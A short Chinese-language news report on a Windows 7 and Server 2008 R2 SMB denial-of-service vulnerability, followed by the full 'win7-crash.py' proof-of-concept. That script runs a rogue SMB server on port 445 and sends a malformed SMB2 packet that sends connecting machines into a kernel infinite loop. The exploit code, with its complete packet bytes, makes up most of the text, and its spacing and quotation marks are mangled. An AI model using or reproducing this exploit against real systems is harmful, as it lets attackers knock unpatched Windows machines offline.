微軟昨日證實，有報告指出Windows7和WindowsServer2008R2中存在一個漏洞，可被用來進行遠端攻擊系統，並導致系統內核崩潰，微軟目前正在就此問題進行調查。

　　微軟官方發言人表示，此漏洞為Windows網路檔和列印共用協定ServerMessageBlock（SMB）中存在的拒絕式服務漏洞，不過迄今為止微軟還沒有發現利用此漏洞實施攻擊行為的案例。

　　附代碼演示：

　　#win7-crash.py：

　　#TriggeraremotekernelcrashonWin7andserver2008R2(infiniteloop)

　　#CrashinKeAccumulateTicks()duetoNT_ASSERT()/DbgRaiseAssertionFailure()causedbyan#infiniteloop.

　　#NOBSOD，YOUGOTTAPULLTHEPLUG.

　　#Totriggeritfast；fromthetarget：\\this_script_ip_addr\BLAH，instantlycrash

　　#Author：LaurentGaffié

　　#

　　importSocketServer

　　packet=”\x00\x00\x00\x9a”#—>lengthshouldbe9enot9a..

　　”\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00″

　　”\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″

　　”\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″

　　”\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″

　　”\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41″

　　”\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00″

　　”\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01″

　　”\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20″

　　”\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e”

　　”\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a”

　　classSMB2(SocketServer.BaseRequestHandler)：

　　defhandle(self)：

　　print”Who：”，self.client_address

　　print”THANKSSDL”

　　input=self.request.recv(1024)

　　self.request.send(packet)

　　self.request.close()

　　launch=SocketServer.TCPServer((”，445)，SMB2)#listenallinterfacesport445

　　launch.serve_forever()